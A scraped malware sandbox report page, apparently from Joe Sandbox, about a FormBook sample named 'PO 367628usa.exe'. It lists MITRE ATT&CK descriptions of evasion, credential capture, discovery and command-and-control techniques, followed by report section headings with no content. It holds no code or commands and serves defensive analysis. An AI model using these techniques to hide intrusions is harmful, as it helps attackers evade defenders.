Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PO 367628usa.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers